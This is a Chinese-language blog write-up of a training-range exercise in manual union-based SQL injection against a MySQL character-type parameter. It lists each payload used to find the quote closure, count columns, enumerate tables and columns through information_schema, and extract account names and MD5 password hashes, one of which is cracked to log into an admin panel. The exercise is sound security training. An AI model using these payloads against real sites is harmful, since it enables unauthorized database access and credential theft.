2. 程式人生 > 其它 >WEB安全-SQL手工注入漏洞測試(MySQL資料庫-字元型 )

WEB安全-SQL手工注入漏洞測試(MySQL資料庫-字元型 )

阿新 發佈:2021-11-18
前言 目前鑽研SQLi注入,這是第二篇,靶場名即為標題,連結如下 https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe 對於靶場,我慢慢的會帶入一些自己的想法,可能有些有問題,請各位師傅可以指出 正文 首先檢視一下題目的提示資訊 進入後檢視頁面,發現和上一次寫的一樣 點進公告,發現和之前一樣 對URL進行除錯,首先先檢視閉合,發現是單引號閉合,這裡由於火狐會自動編碼,所以%23即註釋符# ?id=tingjigonggao' %23 之後考慮有多少列,通過二分法發現最大正常位是4 ?id=tingjigonggao' union order by 4 %23
檢視報錯位,發現是2和3報錯 ?id=tingjigonggao123' union select 1,2,3,4 %23 之後就是流程化的獲取資料,先獲取資料庫資訊為 mozhe_discuz_stormgroup ?id=tingjigonggao123' union select 1,database(),3,4 %23 獲取表的資訊為 notice 、stormgroup_member ?id=tingjigonggao123' union select 1,database(),(select table_name from information_schema.tables where table_schema=database() limit 0,1),4%23
這裡還有一種方式就是通過group_concat()函式拉取表資料,使其在同一行打印出來,逗號分隔,但是試了一下好像一直報錯,先貼出來 ?id=tingjigonggao123' union select 1,database(),(group_concat(table_name) from information_schema.tables where table_schema=database()),4 %23 猜測應該是在stormgroup_member 表裡,拉取列資料為 id name password status ,和之前的一樣, ?id=tingjigonggao123' union select 1,database(),(select column_name from information_schema.columns where table_name="stormgroup_member" limit 0,1),4 %23
之後獲取name和password,name兩個都是mozhe,password為 356f589a7df439f6f744ff19bb8092c0 和 ec2e79576066191cf88df175e0038735 ?id=tingjigonggao123' union select 1,database(),(select name from mozhe_discuz_stormgroup.stormgroup_member limit 0,1),4 %23 ?id=tingjigonggao123' union select 1,database(),(select password from mozhe_discuz_stormgroup.stormgroup_member limit 0,1),4 %23 md5解密後,獲取密碼為 194347,登入後臺獲取key 總結 其實這些SQLi題目都可以用sqlmap跑出來,但是為了鞏固手工注入的能力,在此不做演示,具體參照上一篇布林盲注 一些需要的小知識: information_schema的介紹: information_schema:MySQL自帶的資料庫,儲存了資料庫中所有的資料庫、表和列資訊 information_schema.tables:所有表資訊 information_schema.columns:所有列資訊 table_schema:資料庫名稱 table_name:表名稱 column_name:列名稱 group_concat(table_name):列出所有表名

相關推薦

WEB安全-SQL手工注入漏洞測試(MySQL資料庫-字元 )

前言 目前鑽研SQLi注入,這是第二篇,靶場名即為標題,連結如下 https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

墨者學院-SQL手工注入漏洞測試(Oracle資料庫)

墨者學院-SQL手工注入漏洞測試(Oracle資料庫) 前言   靶場地址:https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe

墨者_SQL手工注入漏洞測試(Oracle資料庫)

靶場: https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe 背景介紹 安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境Apache+PHP+Oracle,PH

墨者學院-SQL過濾字元手工注入漏洞測試(第3題)

墨者學院-SQL過濾字元手工注入漏洞測試(第3題) 前言   一段時間沒做SQL注入的題目了,更一題SQL

WEB安全-SQL注入漏洞測試(時間盲注)

前言 這是SQL注入的第八篇,之前忙著學校的考試,現在結束了就可以再專心打靶場一段時間了

Web安全-SQL注入MySQL注入天書(5-6) Blind Injection

文章目錄內容布林盲注##########注入點判斷撞資料庫版本撞資料庫名使用sqlmap做布林盲注的猜解

[Web安全]SQL注入總結(一)基礎篇

[Web安全]SQL注入總結(一)基礎篇 搞不懂17周了,居然還有很多課要上,sql注入有點多,所以分開來寫,先水一篇

SQL注入漏洞測試

測試背景與環境說明: 公司的監控系統對於使用者登入/退出、許可權修改、重要的操作都會記錄審計日誌,日誌儲存在postgres資料庫中。此外,還有一個提供審計記錄查詢的客戶端工具,介面如下,其中過濾輸入框可以輸入

SQL手工注入方法

 SQL手工注入漏洞測試(MySQL資料庫) 的靶場練習   流程與方法 注意:加粗部分給重點

SQL手工注入MongoDB資料庫

MongoDB語法跟其它資料庫有所區別 具體參考:https://www.runoob.com/mongodb/mongodb-query.html

Web安全學習筆記 XSS漏洞分析下

Web安全學習筆記 XSS下 玲瓏骰子安紅豆,入骨相思知不知。 ——溫庭筠《新添聲楊柳枝詞》

jmeter測試mysql資料庫

1、在測試計劃中新增jar包 用於連線MySQL,需要注意版本問題。 2、執行緒組新增 JDBC Connection Configuration

MYSQL資料庫字元編碼設定

mysql字符集編碼設定與檢視命令轉自http://www.111cn.net/database/mysql/55781.htm 在mysql字元編碼的檢視我們使用SHOW VARIABLES LIKE character即可,修改我們需要修改my.ini中的配置方法了,下面我

Web安全-Joomla核心SQL注入漏洞利用

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

【從入門到放棄系列學習筆記8】web應用安全基礎整理-SQL注入漏洞利用

一、SQL簡介   結構化查詢語言(structured Query language),是一種特殊的程式語言,用於資料庫中的標準資料查詢。

Web安全SQL注入攻擊技巧與防範(轉)

add by zhj: 作者總結了防止SQL的幾種辦法,終極辦法是資料庫(如MySQL)自身提供的預編譯功能,即先將SQL語句中的引數用?替換,發給資料庫進行預編譯,得到編譯結果後再傳入引數替換?,執行SQL

SQL注入之DVWA平臺測試mysql注入

今天主要針對mysql常用注入語句進行測試測試環境與工具:測試平臺:DVWA,下載地址:http://down.51cto.com/data/875088,也可下載metaspolit-table2虛擬機器,裡面已經部署好了dvwa.。***工具:burpsui

初學Web安全sql注入(四)—— 盲注(1)

盲注 當你的輸入沒有回顯,也沒有報錯的時候,但是輸入正確和錯誤的值時,頁面有不同表現時,這時候我們可以嘗試使用布林盲注

Web安全SQL注入總結

本文會介紹POST注入、Head注入、報錯注入、盲注、cookie注入、寬位元組注入、堆疊注入、偏移注入、DNS注入、Access、Mssql、Oracle注入原理和手法。

3. web安全sql注入(3)

sql注入—盲注             sql注入之盲注 目錄 盲注原理 布林盲注